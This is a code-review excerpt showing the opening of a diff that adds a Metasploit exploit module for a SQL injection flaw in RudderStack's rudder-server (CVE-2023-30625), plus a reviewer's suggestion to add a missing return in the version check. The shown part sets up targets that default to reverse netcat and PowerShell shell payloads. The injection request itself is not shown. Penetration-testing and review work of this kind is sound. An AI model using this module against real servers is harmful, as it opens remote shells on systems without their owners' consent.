modules/exploits/multi/http/rudder_server_sqli_rce.rb

```diff
@@ -0,0 +1,135 @@
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Rudder Server SQLI Remote Code Execution',
+        'Description' => %q{
+          This Metasploit module exploits a SQL injection vulnerability in
+          RudderStack's rudder-server, an open source Customer Data Platform (CDP).
+          The vulnerability exists in versions of rudder-server prior to 1.3.0-rc.1.
+          By exploiting this flaw, an attacker can execute arbitrary SQL commands,
+          which may lead to Remote Code Execution (RCE) due to the `rudder` role
+          in PostgresSQL having superuser permissions by default.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Ege Balcı <egebalci@pm.me>' # msf module
+        ],
+        'References' => [
+          ['CVE', '2023-30625'],
+          ['URL', 'https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-30625'],
+        ],
+        'DefaultOptions' => {
+          'SSL' => false,
+          'WfsDelay' => 5
+        },
+        'Platform' => [ 'unix', 'linux' ],
+        'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
+        'Targets' => [
+          ['Automatic', { 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' } }],
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_netcat'
+              }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell_reverse_netcat'
+              }
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'DisclosureDate' => '2023-06-16',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [true, 'The URI of the Rudder API', '/']),
+        OptString.new('API_USER', [false, 'The Rudder API basic authentication username', 'key']),
+        OptString.new('API_PASS', [false, 'The Rudder API basic authentication password', '']),
+      ]
+    )
+  end
+
+  def check
+    version = get_version
+    return Exploit::CheckCode::Unknown if version.nil? || version == 'Unknown'
+
+    if Rex::Version.new('1.2') >= Rex::Version.new(version.gsub('v', ''))
+      Exploit::CheckCode::Appears("Rudder Version: #{version}")
```

Comment:
Also, you need to return this:
```suggestion
      return Exploit::CheckCode::Appears("Rudder Version: #{version}")
```